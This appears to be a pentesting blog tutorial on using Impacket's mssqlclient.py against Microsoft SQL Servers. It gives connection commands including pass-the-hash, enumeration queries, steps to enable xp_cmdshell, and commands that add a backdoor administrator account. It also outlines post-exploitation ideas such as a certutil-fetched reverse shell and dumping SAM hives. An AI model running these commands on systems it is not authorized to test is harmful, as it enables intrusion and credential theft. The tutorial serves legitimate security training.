/ Pentesting-Tools, Post-Exploitation, Uncategorized / By

Mastering mssqlclient.py for Pentesters

mssqlclient.py is part of the Impacket collection, and it’s one of the go-to tools for enumerating and interacting with Microsoft SQL Servers during a pentest. When you land credentials to a SQL Server or discover an exposed database instance, this tool can open the door to privilege escalation, lateral movement, or even domain compromise.

What is mssqlclient.py?

mssqlclient.py is a command-line SQL client that lets you authenticate to and interact with a Microsoft SQL Server using various authentication mechanisms (Windows auth via NTLM or Kerberos, or SQL Server auth). It’s built using Impacket, which handles all the underlying SMB and RPC protocols.

You can use it to:

  • Enumerate system and database info
  • Execute SQL queries
  • Run OS-level commands using xp_cmdshell
  • Explore privilege escalation vectors
  • Inject payloads for lateral movement

Usage Syntax

python3 /path/to/impacket/examples/mssqlclient.py DOMAIN/USERNAME:PASSWORD@TARGET

Examples:

# SQL Auth
python3 mssqlclient.py sa:password123@10.10.10.10

# Windows Auth with NTLM
python3 mssqlclient.py DOMAIN/user:pass@10.10.10.10

# With Hashes
python3 mssqlclient.py DOMAIN/user@10.10.10.10 -hashes LMHASH:NTHASH

# With Kerberos
python3 mssqlclient.py -windows-auth DOMAIN/USERNAME@10.10.10.10 -k

Enumeration with mssqlclient.py

Once inside, you’ll see a SQL> prompt.

🔸 Basic Info

SELECT @@version;                    -- Get SQL Server version
SELECT SYSTEM_USER;                 -- Check logged-in SQL user
SELECT IS_SRVROLEMEMBER('sysadmin'); -- Check if user is sysadmin
SELECT name FROM master..syslogins; -- List logins

🔸 Databases and Tables

SELECT name FROM master..sysdatabases;        -- List databases
SELECT name FROM sysobjects WHERE xtype='U';  -- Tables
SELECT name FROM syscolumns WHERE id=OBJECT_ID('table_name');  -- Columns

🔸 Linked Servers

EXEC sp_linkedservers;             -- Check for linked servers
EXEC sp_helpserver;                -- More info about servers

Privilege Escalation via xp_cmdshell

If you’re lucky and the user has sysadmin, you can use xp_cmdshell to execute OS commands directly.

🔸 Enable xp_cmdshell:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

🔸 Run OS Commands:

EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'net user pentester P@ssw0rd! /add';
EXEC xp_cmdshell 'net localgroup administrators pentester /add';

If xp_cmdshell is disabled and you can’t enable it, check if sp_OACreate or CLR assemblies are available.

Useful Tips

  • If you can’t authenticate directly, but have Net-NTLMv2 hashes, use crackmapexec or john/hashcat to crack them, or try Kerberos ticket abuse if TGT is available.
  • Always check linked servers — they might allow you to pivot or escalate.
  • If you’re not sysadmin, escalate using stored procedures, impersonation, or UDF injection.
  • Use PowerUpSQL or SQLRecon for deeper AD-integrated enumeration.

Post-Exploitation Ideas

  • Drop a reverse shell via xp_cmdshell (e.g., using certutil to fetch payloads).
  • Enable RDP via command line and add your user to Remote Desktop Users.
  • Dump SAM or SYSTEM hives with reg save if you have file system access.
  • Use the SQL Server to pivot deeper into the internal network.

🔹 Final Thoughts

mssqlclient.py is a powerful post-exploitation tool, especially when you’ve got SQL credentials or discover open SQL ports (TCP 1433). It bridges the gap between SQL exploitation and OS-level control, which can easily turn a foothold into full domain compromise if misconfigurations are present.

In the hands of a skilled pentester, this tool becomes a silent weapon.

Related Posts

Scroll to Top